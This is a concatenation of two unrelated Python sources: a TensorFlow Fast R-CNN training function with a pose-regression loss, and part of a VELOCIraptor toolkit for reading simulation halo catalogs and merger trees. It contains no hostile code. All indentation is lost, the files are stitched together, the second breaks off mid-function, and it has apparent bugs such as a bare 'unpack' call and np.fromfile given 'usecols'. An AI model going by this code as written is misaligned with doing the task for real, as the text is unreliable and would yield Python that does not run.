def smooth_l1_loss(bbox_pred, bbox_targets, bbox_inside_weights, bbox_outside_weights, sigma=1.0, dim=[1]):
sigma_2 = sigma ** 2
box_diff = bbox_pred - bbox_targets
in_box_diff = bbox_inside_weights * box_diff
abs_in_box_diff = tf.abs(in_box_diff)
smoothL1_sign = tf.stop_gradient(tf.to_float(tf.less(abs_in_box_diff, 1. / sigma_2)))
in_loss_box = tf.pow(in_box_diff, 2) * (sigma_2 / 2.) * smoothL1_sign \
+ (abs_in_box_diff - (0.5 / sigma_2)) * (1. - smoothL1_sign)
out_loss_box = bbox_outside_weights * in_loss_box
loss_box = tf.reduce_mean(tf.reduce_sum(
out_loss_box,
axis=dim
))
return loss_box
def train_net_det(network, imdb, roidb, output_dir, pretrained_model=None, pretrained_ckpt=None, max_iters=40000):
"""Train a Fast R-CNN network."""
loss_regu = tf.add_n(tf.losses.get_regularization_losses(), 'regu')
# RPN, class loss
rpn_cls_score = tf.reshape(network.get_output('rpn_cls_score_reshape'), [-1, 2])
rpn_label = tf.reshape(network.get_output('rpn_labels'), [-1])
rpn_select = tf.where(tf.not_equal(rpn_label, -1))
rpn_cls_score = tf.reshape(tf.gather(rpn_cls_score, rpn_select), [-1, 2])
rpn_label = tf.reshape(tf.gather(rpn_label, rpn_select), [-1])
loss_rpn_cls = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=rpn_cls_score, labels=rpn_label))
# RPN, bbox loss
rpn_bbox_pred = network.get_output('rpn_bbox_pred')
rpn_bbox_targets = network.get_output('rpn_bbox_targets')
rpn_bbox_inside_weights = network.get_output('rpn_bbox_inside_weights')
rpn_bbox_outside_weights = network.get_output('rpn_bbox_outside_weights')
loss_rpn_box = smooth_l1_loss(rpn_bbox_pred, rpn_bbox_targets, rpn_bbox_inside_weights,
rpn_bbox_outside_weights, sigma=3.0, dim=[1, 2, 3])
# RCNN, class loss
cls_score = network.get_output("cls_score")
label = tf.reshape(network.get_output("labels"), [-1])
loss_cls = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=cls_score, labels=label))
# RCNN, bbox loss
bbox_pred = network.get_output('bbox_pred')
bbox_targets = network.get_output('bbox_targets')
bbox_inside_weights = network.get_output('bbox_inside_weights')
bbox_outside_weights = network.get_output('bbox_outside_weights')
loss_box = smooth_l1_loss(bbox_pred, bbox_targets, bbox_inside_weights, bbox_outside_weights)
# pose regression loss
loss_pose = network.get_output('loss_pose')[0]
# add losses
loss = loss_rpn_cls + loss_rpn_box + loss_cls + loss_box + loss_pose + loss_regu
# optimizer
global_step = tf.Variable(0, trainable=False)
starter_learning_rate = cfg.TRAIN.LEARNING_RATE
learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
cfg.TRAIN.STEPSIZE, 0.1, staircase=True)
momentum = cfg.TRAIN.MOMENTUM
train_op = tf.train.MomentumOptimizer(learning_rate, momentum).minimize(loss, global_step=global_step)
# config = tf.ConfigProto()
# config.gpu_options.per_process_gpu_memory_fraction = 0.85
# config.gpu_options.allow_growth = True
# with tf.Session(config=config) as sess:
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
sw = SolverWrapper(sess, network, imdb, roidb, output_dir, pretrained_model=pretrained_model, pretrained_ckpt=pretrained_ckpt)
# thread to load data
data_layer = GtSynthesizeLayer(roidb, imdb.num_classes, imdb._extents, imdb._points_all, imdb._symmetry, imdb.cache_path, imdb.name, cfg.CAD, cfg.POSE)
print 'Solving...'
sw.train_model_det(sess, train_op, loss, loss_rpn_cls, loss_rpn_box, loss_cls, loss_box, loss_pose, learning_rate, max_iters, data_layer)
print 'done solving'
|
velociraptor_python_tools.py | #Make backwards compatible with python 2, ignored in python 3
from __future__ import print_function
import sys,os,os.path,string,time,re,struct
import math,operator
import numpy as np
import h5py #import hdf5 interface
import tables as pytb #import pytables
import pandas as pd
from copy import deepcopy
from collections import deque
import itertools
import scipy.interpolate as scipyinterp
import scipy.spatial as spatial
import multiprocessing as mp
from collections import deque
import copy
import cython
from cython.parallel import prange, parallel
#would be good to compile these routines with cython
#try to speed up search
#cimport numpy as np
"""
Routines for reading velociraptor output
"""
"""
IO Routines
"""
def ReadPropertyFile(basefilename,ibinary=0,iseparatesubfiles=0,iverbose=0, desiredfields=[], isiminfo=True, iunitinfo=True):
"""
VELOCIraptor/STF files in various formats
for example ascii format contains
a header with
filenumber number_of_files
numhalos_in_file nnumhalos_in_total
followed by a header listing the information contain. An example would be
ID(1) ID_mbp(2) hostHaloID(3) numSubStruct(4) npart(5) Mvir(6) Xc(7) Yc(8) Zc(9) Xcmbp(10) Ycmbp(11) Zcmbp(12) VXc(13) VYc(14) VZc(15) VXcmbp(16) VYcmbp(17) VZcmbp(18) Mass_tot(19) Mass_FOF(20) Mass_200mean(21) Mass_200crit(22) Mass_BN97(23) Efrac(24) Rvir(25) R_size(26) R_200mean(27) R_200crit(28) R_BN97(29) R_HalfMass(30) Rmax(31) Vmax(32) sigV(33) veldisp_xx(34) veldisp_xy(35) veldisp_xz(36) veldisp_yx(37) veldisp_yy(38) veldisp_yz(39) veldisp_zx(40) veldisp_zy(41) veldisp_zz(42) lambda_B(43) Lx(44) Ly(45) Lz(46) q(47) s(48) eig_xx(49) eig_xy(50) eig_xz(51) eig_yx(52) eig_yy(53) eig_yz(54) eig_zx(55) eig_zy(56) eig_zz(57) cNFW(58) Krot(59) Ekin(60) Epot(61) n_gas(62) M_gas(63) Xc_gas(64) Yc_gas(65) Zc_gas(66) VXc_gas(67) VYc_gas(68) VZc_gas(69) Efrac_gas(70) R_HalfMass_gas(71) veldisp_xx_gas(72) veldisp_xy_gas(73) veldisp_xz_gas(74) veldisp_yx_gas(75) veldisp_yy_gas(76) veldisp_yz_gas(77) veldisp_zx_gas(78) veldisp_zy_gas(79) veldisp_zz_gas(80) Lx_gas(81) Ly_gas(82) Lz_gas(83) q_gas(84) s_gas(85) eig_xx_gas(86) eig_xy_gas(87) eig_xz_gas(88) eig_yx_gas(89) eig_yy_gas(90) eig_yz_gas(91) eig_zx_gas(92) eig_zy_gas(93) eig_zz_gas(94) Krot_gas(95) T_gas(96) Zmet_gas(97) SFR_gas(98) n_star(99) M_star(100) Xc_star(101) Yc_star(102) Zc_star(103) VXc_star(104) VYc_star(105) VZc_star(106) Efrac_star(107) R_HalfMass_star(108) veldisp_xx_star(109) veldisp_xy_star(110) veldisp_xz_star(111) veldisp_yx_star(112) veldisp_yy_star(113) veldisp_yz_star(114) veldisp_zx_star(115) veldisp_zy_star(116) veldisp_zz_star(117) Lx_star(118) Ly_star(119) Lz_star(120) q_star(121) s_star(122) eig_xx_star(123) eig_xy_star(124) eig_xz_star(125) eig_yx_star(126) eig_yy_star(127) eig_yz_star(128) eig_zx_star(129) eig_zy_star(130) eig_zz_star(131) Krot_star(132) tage_star(133) Zmet_star(134)
then followed by data
Note that a file will indicate how many files the total output has been split into
Not all fields need be read in. If only want specific fields, can pass a string of desired fields like
['ID', 'Mass_FOF', 'Krot']
#todo still need checks to see if fields not present and if so, not to include them or handle the error
"""
#this variable is the size of the char array in binary formated data that stores the field names
CHARSIZE=40
start = time.clock()
inompi=True
if (iverbose): print("reading properties file",basefilename)
filename=basefilename+".properties"
#load header
if (os.path.isfile(filename)==True):
numfiles=0
else:
filename=basefilename+".properties"+".0"
inompi=False
if (os.path.isfile(filename)==False):
print("file not found")
return []
byteoffset=0
#used to store fields, their type, etc
fieldnames=[]
fieldtype=[]
fieldindex=[]
if (ibinary==0):
#load ascii file
halofile = open(filename, 'r')
#read header information
[filenum,numfiles]=halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numhalos, numtothalos]= halofile.readline().split()
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
names = ((halofile.readline())).split()
#remove the brackets in ascii file names
fieldnames= [fieldname.split("(")[0] for fieldname in names]
for i in np.arange(fieldnames.__len__()):
fieldname=fieldnames[i]
if fieldname in ["ID","numSubStruct","npart","n_gas","n_star", "Structuretype"]:
fieldtype.append(np.uint64)
elif fieldname in ["ID_mbp", "hostHaloID"]:
fieldtype.append(np.int64)
else:
fieldtype.append(np.float64)
halofile.close()
#if desiredfields is NULL load all fields
#but if this is passed load only those fields
if (len(desiredfields)>0):
lend=len(desiredfields)
fieldindex=np.zeros(lend,dtype=int)
desiredfieldtype=[[] for i in range(lend)]
for i in range(lend):
fieldindex[i]=fieldnames.index(desiredfields[i])
desiredfieldtype[i]=fieldtype[fieldindex[i]]
fieldtype=desiredfieldtype
fieldnames=desiredfields
#to store the string containing data format
fieldtypestring=''
for i in np.arange(fieldnames.__len__()):
if fieldtype[i]==np.uint64: fieldtypestring+='u8,'
elif fieldtype[i]==np.int64: fieldtypestring+='i8,'
elif fieldtype[i]==np.float64: fieldtypestring+='f8,'
elif (ibinary==1):
#load binary file
halofile = open(filename, 'rb')
[filenum,numfiles]=np.fromfile(halofile,dtype=np.int32,count=2)
[numhalos,numtothalos]=np.fromfile(halofile,dtype=np.uint64,count=2)
headersize=np.fromfile(halofile,dtype=np.int32,count=1)[0]
byteoffset=np.dtype(np.int32).itemsize*3+np.dtype(np.uint64).itemsize*2+4*headersize
for i in range(headersize):
fieldnames.append(unpack('s', halofile.read(CHARSIZE)).strip())
for i in np.arange(fieldnames.__len__()):
fieldname=fieldnames[i]
if fieldname in ["ID","numSubStruct","npart","n_gas","n_star", "Structuretype"]:
fieldtype.append(np.uint64)
elif fieldname in ["ID_mbp", "hostHaloID"]:
fieldtype.append(np.int64)
else:
fieldtype.append(np.float64)
halofile.close()
#if desiredfields is NULL load all fields
#but if this is passed load only those fields
if (len(desiredfields)>0):
lend=len(desiredfields)
fieldindex=np.zeros(lend,dtype=int)
desiredfieldtype=[[] for i in range(lend)]
for i in range(lend):
fieldindex[i]=fieldnames.index(desiredfields[i])
desiredfieldtype[i]=fieldtype[fieldindex[i]]
fieldtype=desiredfieldtype
fieldnames=desiredfields
#to store the string containing data format
fieldtypestring=''
for i in np.arange(fieldnames.__len__()):
if fieldtype[i]==np.uint64: fieldtypestring+='u8,'
elif fieldtype[i]==np.int64: fieldtypestring+='i8,'
elif fieldtype[i]==np.float64: fieldtypestring+='f8,'
elif (ibinary==2):
#load hdf file
halofile = h5py.File(filename, 'r')
filenum=int(halofile["File_id"][0])
numfiles=int(halofile["Num_of_files"][0])
numhalos=np.uint64(halofile["Num_of_groups"][0])
numtothalos=np.uint64(halofile["Total_num_of_groups"][0])
#atime=np.float(halofile.attrs["Time"])
fieldnames=[str(n) for n in halofile.keys()]
#clean of header info
fieldnames.remove("File_id")
fieldnames.remove("Num_of_files")
fieldnames.remove("Num_of_groups")
fieldnames.remove("Total_num_of_groups")
fieldtype=[halofile[fieldname].dtype for fieldname in fieldnames]
#if the desiredfields argument is passed only these fieds are loaded
if (len(desiredfields)>0):
if (iverbose):print("Loading subset of all fields in property file ", len(desiredfields), " instead of ", len(fieldnames))
fieldnames=desiredfields
fieldtype=[halofile[fieldname].dtype for fieldname in fieldnames]
halofile.close()
#allocate memory that will store the halo dictionary
catalog={fieldnames[i]:np.zeros(numtothalos,dtype=fieldtype[i]) for i in range(len(fieldnames))}
noffset=np.uint64(0)
for ifile in range(numfiles):
if (inompi==True): filename=basefilename+".properties"
else: filename=basefilename+".properties"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
if (ibinary==0):
halofile = open(filename, 'r')
halofile.readline()
numhalos=np.uint64(halofile.readline().split()[0])
halofile.close()
if (numhalos>0):htemp = np.loadtxt(filename,skiprows=3, usecols=fieldindex, dtype=fieldtypestring, unpack=True, ndmin=1)
elif(ibinary==1):
halofile = open(filename, 'rb')
np.fromfile(halofile,dtype=np.int32,count=2)
numhalos=np.fromfile(halofile,dtype=np.uint64,count=2)[0]
#halofile.seek(byteoffset);
if (numhalos>0):htemp=np.fromfile(halofile, usecols=fieldindex, dtype=fieldtypestring, unpack=True)
halofile.close()
elif(ibinary==2):
#here convert the hdf information into a numpy array
halofile = h5py.File(filename, 'r')
numhalos=np.uint64(halofile["Num_of_groups"][0])
if (numhalos>0):htemp=[np.array(halofile[catvalue]) for catvalue in fieldnames]
halofile.close()
#numhalos=len(htemp[0])
for i in range(len(fieldnames)):
catvalue=fieldnames[i]
if (numhalos>0): catalog[catvalue][noffset:noffset+numhalos]=htemp[i]
noffset+=numhalos
#if subhalos are written in separate files, then read them too
if (iseparatesubfiles==1):
for ifile in range(numfiles):
if (inompi==True): filename=basefilename+".sublevels"+".properties"
else: filename=basefilename+".sublevels"+".properties"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
if (ibinary==0):
halofile = open(filename, 'r')
halofile.readline()
numhalos=np.uint64(halofile.readline().split()[0])
halofile.close()
if (numhalos>0):htemp = np.loadtxt(filename,skiprows=3, usecols=fieldindex, dtype=fieldtypestring, unpack=True, ndmin=1)
elif(ibinary==1):
halofile = open(filename, 'rb')
#halofile.seek(byteoffset);
np.fromfile(halofile,dtype=np.int32,count=2)
numhalos=np.fromfile(halofile,dtype=np.uint64,count=2)[0]
if (numhalos>0):htemp=np.fromfile(halofile, usecols=fieldindex, dtype=fieldtypestring, unpack=True)
halofile.close()
elif(ibinary==2):
halofile = h5py.File(filename, 'r')
numhalos=np.uint64(halofile["Num_of_groups"][0])
if (numhalos>0):htemp=[np.array(halofile[catvalue]) for catvalue in fieldnames]
halofile.close()
#numhalos=len(htemp[0])
for i in range(len(fieldnames)):
catvalue=fieldnames[i]
if (numhalos>0): catalog[catvalue][noffset:noffset+numhalos]=htemp[i]
noffset+=numhalos
#load associated simulation info, time and units
if (isiminfo):
siminfoname=basefilename+".siminfo"
siminfo=open(siminfoname,'r')
catalog['SimulationInfo']=dict()
for l in siminfo:
d=l.strip().split(' : ')
catalog['SimulationInfo'][d[0]]=float(d[1])
siminfo.close()
if (iunitinfo):
unitinfoname=basefilename+".units"
unitinfo=open(unitinfoname,'r')
catalog['UnitInfo']=dict()
for l in unitinfo:
d=l.strip().split(' : ')
catalog['UnitInfo'][d[0]]=float(d[1])
unitinfo.close()
if (iverbose): print("done reading properties file ",time.clock()-start)
return catalog,numtothalos
def ReadPropertyFileMultiWrapper(basefilename,index,halodata,numhalos,atime,ibinary=0,iseparatesubfiles=0,iverbose=0,desiredfields=[]):
"""
Wrapper for multithreaded reading
"""
#call read routine and store the data
halodata[index],numhalos[index]=ReadPropertyFile(basefilename,ibinary,iseparatesubfiles,iverbose,desiredfields)
def ReadPropertyFileMultiWrapperNamespace(index,basefilename,ns,ibinary=0,iseparatesubfiles=0,iverbose=0,desiredfields=[]):
#call read routine and store the data
ns.hdata[index],ns.ndata[index]=ReadPropertyFile(basefilename,ibinary,iseparatesubfiles,iverbose,desiredfields)
def ReadHaloMergerTree(treefilename,ibinary=0,iverbose=0,imerit=False,inpart=False):
"""
VELOCIraptor/STF merger tree in ascii format contains
a header with
number_of_snapshots
a description of how the tree was built
total number of halos across all snapshots
then followed by data
for each snapshot
snapshotvalue numhalos
haloid_1 numprogen_1
progenid_1
progenid_2
...
progenid_numprogen_1
haloid_2 numprogen_2
.
.
.
one can also have an output format that has an additional field for each progenitor, the meritvalue
"""
start = time.clock()
tree=[]
if (iverbose): print("reading Tree file",treefilename,os.path.isfile(treefilename))
if (os.path.isfile(treefilename)==False):
print("Error, file not found")
return tree
#if ascii format
if (ibinary==0):
treefile = open(treefilename, 'r')
numsnap=int(treefile.readline())
treefile.close()
elif(ibinary==2):
snaptreelist=open(treefilename,'r')
numsnap = sum(1 for line in snaptreelist)
snaptreelist.close()
else:
print("Unknown format, returning null")
numsnap=0
return tree
tree=[{"haloID": [], "Num_progen": [], "Progen": []} for i in range(numsnap)]
if (imerit):
for i in range(numsnap):
tree[i]['Merit']=[]
if (inpart):
for i in range(numsnap):
tree[i]['Npart']=[]
tree[i]['Npart_progen']=[]
#if ascii format
if (ibinary==0):
treefile = open(treefilename, 'r')
numsnap=int(treefile.readline())
descrip=treefile.readline().strip()
tothalos=int(treefile.readline())
offset=0
totalnumprogen=0
for i in range(numsnap):
[snapval,numhalos]=treefile.readline().strip().split('\t')
snapval=int(snapval);numhalos=int(numhalos)
#if really verbose
if (iverbose==2): print(snapval,numhalos)
tree[i]["haloID"]=np.zeros(numhalos, dtype=np.int64)
tree[i]["Num_progen"]=np.zeros(numhalos, dtype=np.uint32)
tree[i]["Progen"]=[[] for j in range(numhalos)]
if (imerit): tree[i]["Merit"]=[[] for j in range(numhalos)]
if (inpart):
tree[i]["Npart"]=np.zeros(numhalos, dtype=np.uint32)
tree[i]["Npart_progen"]=[[] for j in range(numhalos)]
for j in range(numhalos):
data=treefile.readline().strip().split('\t')
hid=np.int64(data[0]);nprog=np.uint32(data[1])
tree[i]["haloID"][j]=hid
tree[i]["Num_progen"][j]=nprog
if (inpart):tree[i]["Npart"][j]=np.uint32(data[2])
totalnumprogen+=nprog
if (nprog>0):
tree[i]["Progen"][j]=np.zeros(nprog,dtype=np.int64)
if (imerit): tree[i]["Merit"][j]=np.zeros(nprog,dtype=np.float32)
if (inpart): tree[i]["Npart_progen"][j]=np.zeros(nprog,dtype=np.uint32)
for k in range(nprog):
data=treefile.readline().strip().split(' ')
tree[i]["Progen"][j][k]=np.int64(data[0])
if (imerit):tree[i]["Merit"][j][k]=np.float32(data[1])
if (inpart):tree[i]["Npart_progen"][j][k]=np.uint32(data[2])
elif(ibinary==2):
snaptreelist=open(treefilename,'r')
#read the first file, get number of snaps from hdf file
snaptreename = snaptreelist.readline().strip()+".tree"
treedata=h5py.File(snaptreename,"r")
numsnaps=treedata.attrs['Number_of_snapshots']
treedata.close()
snaptreelist.close()
snaptreelist=open(treefilename,'r')
for snap in range(numsnaps):
snaptreename = snaptreelist.readline().strip()+".tree"
if (iverbose): print("Reading",snaptreename)
treedata = h5py.File(snaptreename,"r")
tree[snap]["haloID"] = np.asarray(treedata["ID"])
tree[snap]["Num_progen"] = np.asarray(treedata["NumProgen"])
if(inpart):tree[snap]["Npart"] = np.asarray(treedata["Npart"])
#See if the dataset exits
if("ProgenOffsets" in treedata.keys()):
#Find the indices to split the array
split = np.add(np.asarray(treedata["ProgenOffsets"]),tree[snap]["Num_progen"],dtype=np.uint64,casting="unsafe")
#Read in the progenitors, splitting them as reading them in
tree[snap]["Progen"] = np.split(treedata["Progenitors"][:],split[:-1])
if(inpart): tree[snap]["Npart_progen"] = np.split(treedata["ProgenNpart"],split[:-1])
if(imerit): tree[snap]["Merit"] = np.split(treedata["Merits"],split[:-1])
snaptreelist.close()
if (iverbose): print("done reading tree file ",time.clock()-start)
return tree
def ReadHaloMergerTreeDescendant(treefilename,ireverseorder=True,ibinary=0,iverbose=0,imerit=False,inpart=False):
"""
VELOCIraptor/STF descendant based merger tree in ascii format contains
a header with
number_of_snapshots
a description of how the tree was built
total number of halos across all snapshots
then followed by data
for each snapshot
snapshotvalue numhalos
haloid_1 numprogen_1
progenid_1
progenid_2
...
progenid_numprogen_1
haloid_2 numprogen_2
.
.
.
one can also have an output format that has an additional field for each progenitor, the meritvalue
"""
start = time.clock()
tree=[]
if (iverbose): print("reading Tree file",treefilename,os.path.isfile(treefilename))
if (os.path.isfile(treefilename)==False):
print("Error, file not found")
return tree
#fine out how many snapshots there are
#if ascii format
if (ibinary==0):
if (iverbose): print("Reading ascii input")
treefile = open(treefilename, 'r')
numsnap=int(treefile.readline())
treefile.close()
#hdf format, input file is a list of filenames
elif(ibinary==2):
if (iverbose): print("Reading HDF5 input")
snaptreelist=open(treefilename,'r')
numsnap = sum(1 for line in snaptreelist)
snaptreelist.close()
else:
print("Unknown format, returning null")
numsnap=0
return tree
tree=[{"haloID": [], "Num_descen": [], "Descen": [], "Rank": []} for i in range(numsnap)]
if (imerit):
for i in range(numsnap):
tree[i]['Merit']=[]
if (inpart):
for i in range(numsnap):
tree[i]['Npart']=[]
tree[i]['Npart_descen']=[]
if (ibinary==0):
treefile = open(treefilename, 'r')
numsnap=int(treefile.readline())
descrip=treefile.readline().strip()
tothalos=int(treefile.readline())
offset=0
totalnumdescen=0
for i in range(numsnap):
ii=i
if (ireverseorder): ii=numsnap-1-i
[snapval,numhalos]=treefile.readline().strip().split('\t')
snapval=int(snapval);numhalos=int(numhalos)
#if really verbose
if (iverbose==2): print(snapval,numhalos)
tree[ii]["haloID"]=np.zeros(numhalos, dtype=np.int64)
tree[ii]["Num_descen"]=np.zeros(numhalos, dtype=np.uint32)
tree[ii]["Descen"]=[[] for j in range(numhalos)]
tree[ii]["Rank"]=[[] for j in range(numhalos)]
if (imerit): tree[ii]["Merit"]=[[] for j in range(numhalos)]
if (inpart):
tree[i]["Npart"]=np.zeros(numhalos, dtype=np.uint32)
tree[ii]["Npart_descen"]=[[] for j in range(numhalos)]
for j in range(numhalos):
data=treefile.readline().strip().split('\t')
hid=np.int64(data[0]);ndescen=np.uint32(data[1])
tree[ii]["haloID"][j]=hid
tree[ii]["Num_descen"][j]=ndescen
if (inpart):tree[ii]["Npart"][j]=np.uint32(data[2])
totalnumdescen+=ndescen
if (ndescen>0):
tree[ii]["Descen"][j]=np.zeros(ndescen,dtype=np.int64)
tree[ii]["Rank"][j]=np.zeros(ndescen,dtype=np.uint32)
if (imerit): tree[ii]["Merit"][j]=np.zeros(ndescen,dtype=np.float32)
if (inpart): tree[ii]["Npart_descen"][j]=np.zeros(ndescen,dtype=np.float32)
for k in range(ndescen):
data=treefile.readline().strip().split(' ')
tree[ii]["Descen"][j][k]=np.int64(data[0])
tree[ii]["Rank"][j][k]=np.uint32(data[1])
if (imerit): tree[ii]["Merit"][j][k]=np.float32(data[2])
if (inpart): tree[ii]["Npart_descen"][j][k]=np.uint32(data[3])
#hdf format
elif(ibinary==2):
snaptreelist=open(treefilename,'r')
#read the first file, get number of snaps from hdf file
snaptreename = snaptreelist.readline().strip()+".tree"
treedata=h5py.File(snaptreename,"r")
numsnaps=treedata.attrs['Number_of_snapshots']
treedata.close()
snaptreelist.close()
snaptreelist=open(treefilename,'r')
for snap in range(numsnap):
snaptreename = snaptreelist.readline().strip()+".tree"
if (iverbose): print("Reading",snaptreename)
treedata = h5py.File(snaptreename,"r")
tree[snap]["haloID"] = np.array(treedata["ID"])
tree[snap]["Num_descen"] = np.array(treedata["NumDesc"])
if(inpart):tree[snap]["Npart"] = np.asarray(treedata["Npart"])
#See if the dataset exits
if("DescOffsets" in treedata.keys()):
#Find the indices to split the array
split = np.add(np.array(treedata["DescOffsets"]), tree[snap]["Num_descen"],dtype=np.uint64,casting="unsafe")
# Read in the data splitting it up as reading it in
tree[snap]["Rank"] = np.split(treedata["Ranks"][:],split[:-1])
tree[snap]["Descen"] = np.split(treedata["Descendants"][:],split[:-1])
if(inpart): tree[snap]["Npart_progen"] = np.split(treedata["ProgenNpart"][:],split[:-1])
if(imerit): tree[snap]["Merit"] = np.split(treedata["Merits"][:],split[:-1])
snaptreelist.close()
if (iverbose): print("done reading tree file ",time.clock()-start)
return tree
def ReadHaloPropertiesAcrossSnapshots(numsnaps,snaplistfname,inputtype,iseperatefiles,iverbose=0,desiredfields=[]):
"""
read halo data from snapshots listed in file with snaplistfname file name
"""
halodata=[dict() for j in range(numsnaps)]
ngtot=[0 for j in range(numsnaps)]
atime=[0 for j in range(numsnaps)]
start=time.clock()
print("reading data")
#if there are a large number of snapshots to read, read in parallel
#only read in parallel if worthwhile, specifically if large number of snapshots and snapshots are ascii
iparallel=(numsnaps>20 and inputtype==2)
if (iparallel):
#determine maximum number of threads
nthreads=min(mp.cpu_count(),numsnaps)
nchunks=int(np.ceil(numsnaps/float(nthreads)))
print("Using", nthreads,"threads to parse ",numsnaps," snapshots in ",nchunks,"chunks")
#load file names
snapnamelist=open(snaplistfname,'r')
catfilename=["" for j in range(numsnaps)]
for j in range(numsnaps):
catfilename[j]=snapnamelist.readline().strip()
#allocate a manager
manager = mp.Manager()
#use manager to specify the dictionary and list that can be accessed by threads
hdata=manager.list([manager.dict() for j in range(numsnaps)])
ndata=manager.list([0 for j in range(numsnaps)])
adata=manager.list([0 for j in range(numsnaps)])
#now for each chunk run a set of proceses
for j in range(nchunks):
offset=j*nthreads
#if last chunk then must adjust nthreads
if (j==nchunks-1):
nthreads=numsnaps-offset
#when calling a process pass manager based proxies, which then are used to copy data back
processes=[mp.Process(target=ReadPropertyFileMultiWrapper,args=(catfilename[offset+k],k+offset,hdata,ndata,adata,inputtype,iseperatefiles,iverbose,desiredfields)) for k in range(nthreads)]
#start each process
#store the state of each thread, alive or not, and whether it has finished
activethreads=[[True,False] for k in range(nthreads)]
count=0
for p in processes:
print("reading", catfilename[offset+count])
p.start()
#space threads apart (join's time out is 0.25 seconds
p.join(0.2)
count+=1
totactivethreads=nthreads
while(totactivethreads>0):
count=0
for p in processes:
#join thread and see if still active
p.join(0.5)
if (p.is_alive()==False):
#if thread nolonger active check if its been processed
if (activethreads[count][1]==False):
#make deep copy of manager constructed objects that store data
#halodata[i][offset+count]=deepcopy(hdata[offset+count])
#try instead init a dictionary
halodata[offset+count]=dict(hdata[offset+count])
ngtot[offset+count]=ndata[offset+count]
atime[offset+count]=adata[offset+count]
#effectively free the data in manager dictionary
hdata[offset+count]=[]
activethreads[count][0]=False
activethreads[count][1]=True
totactivethreads-=1
count+=1
#terminate threads
for p in processes:
p.terminate()
else:
snapnamelist=open(snaplistfname,'r')
for j in range(0,numsnaps):
catfilename=snapnamelist.readline().strip()
print("reading ", catfilename)
halodata[j],ngtot[j],atime[j] = ReadPropertyFile(catfilename,inputtype,iseperatefiles,iverbose,desiredfields)
print("data read in ",time.clock()-start)
return halodata,ngtot,atime
def ReadCrossCatalogList(fname,meritlim=0.1,iverbose=0):
"""
Reads a cross catalog produced by halomergertree,
also allows trimming of cross catalog using a higher merit threshold than one used to produce catalog
"""
start = time.clock()
if (iverbose): print("reading cross catalog")
dfile=open(fname,"r")
dfile.readline()
dfile.readline()
dataline=(dfile.readline().strip()).split('\t')
ndata=np.int32(dataline[1])
pdata=CrossCatalogList(ndata)
for i in range(0,ndata):
data=(dfile.readline().strip()).split('\t')
nmatches=np.int32(data[1])
for j in range(0,nmatches):
data=(dfile.readline().strip()).split(' ')
meritval=np.float32(data[1])
nsharedval=np.float32(data[2])
if(meritval>meritlim):
nmatchid=np.int64(data[0])
pdata.matches[i].append(nmatchid)
pdata.matches[i].append(meritval)
pdata.nsharedfrac[i].append(nsharedval)
pdata.nmatches[i]+=1
dfile.close()
if (iverbose): print("done reading cross catalog ",time.clock()-start)
return pdata
def ReadSimInfo(basefilename):
"""
Reads in the information in .siminfo and returns it as a dictionary
"""
filename = basefilename + ".siminfo"
if (os.path.isfile(filename)==False):
print("file not found")
return []
cosmodata = {}
siminfofile = open(filename,"r")
line = siminfofile.readline().strip().split(" : ")
while(line[0]!=""):
cosmodata[line[0]] = float(line[1])
line = siminfofile.readline().strip().split(" : ")
siminfofile.close()
return cosmodata
def ReadUnitInfo(basefilename):
"""
Reads in the information in .units and returns it as a dictionary
"""
filename = basefilename + ".units"
if (os.path.isfile(filename)==False):
print("file not found")
return []
unitdata = {}
unitsfile = open(filename,"r")
line = unitsfile.readline().strip().split(" : ")
while(line[0]!=""):
unitdata[line[0]] = float(line[1])
line = unitsfile.readline().strip().split(" : ")
unitsfile.close()
return unitdata
def ReadParticleDataFile(basefilename,ibinary=0,iseparatesubfiles=0,iparttypes=0,iverbose=0, binarydtype=np.int64):
"""
VELOCIraptor/STF catalog_group, catalog_particles and catalog_parttypes in various formats
Note that a file will indicate how many files the total output has been split into
"""
inompi=True
if (iverbose): print("reading particle data",basefilename)
gfilename=basefilename+".catalog_groups"
pfilename=basefilename+".catalog_particles"
upfilename=pfilename+".unbound"
tfilename=basefilename+".catalog_parttypes"
utfilename=tfilename+".unbound"
#check for file existence
if (os.path.isfile(gfilename)==True):
numfiles=0
else:
gfilename+=".0"
pfilename+=".0"
upfilename+=".0"
tfilename+=".0"
utfilename+=".0"
inompi=False
if (os.path.isfile(gfilename)==False):
print("file not found")
return []
byteoffset=0
#load header information from file to get total number of groups
#ascii
if (ibinary==0):
gfile = open(gfilename, 'r')
[filenum,numfiles]=gfile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numhalos, numtothalos]= gfile.readline().split()
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#binary
elif (ibinary==1):
gfile = open(gfilename, 'rb')
[filenum,numfiles]=np.fromfile(gfile,dtype=np.int32,count=2)
[numhalos,numtothalos]=np.fromfile(gfile,dtype=np.uint64,count=2)
#hdf
elif (ibinary==2):
gfile = h5py.File(gfilename, 'r')
filenum=int(gfile["File_id"][0])
numfiles=int(gfile["Num_of_files"][0])
numhalos=np.uint64(gfile["Num_of_groups"][0])
numtothalos=np.uint64(gfile["Total_num_of_groups"][0])
gfile.close()
particledata=dict()
particledata['Npart']=np.zeros(numtothalos,dtype=np.uint64)
particledata['Npart_unbound']=np.zeros(numtothalos,dtype=np.uint64)
particledata['Particle_IDs']=[[] for i in range(numtothalos)]
if (iparttypes==1):
particledata['Particle_Types']=[[] for i in range(numtothalos)]
#now for all files
counter=np.uint64(0)
subfilenames=[""]
if (iseparatesubfiles==1): subfilenames=["",".sublevels"]
for ifile in range(numfiles):
for subname in subfilenames:
bfname=basefilename+subname
gfilename=bfname+".catalog_groups"
pfilename=bfname+".catalog_particles"
upfilename=pfilename+".unbound"
tfilename=bfname+".catalog_parttypes"
utfilename=tfilename+".unbound"
if (inompi==False):
gfilename+="."+str(ifile)
pfilename+="."+str(ifile)
upfilename+="."+str(ifile)
tfilename+="."+str(ifile)
utfilename+="."+str(ifile)
if (iverbose) : print("reading",bfname,ifile)
#ascii
if (ibinary==0):
gfile = open(gfilename, 'r')
#read header information
gfile.readline()
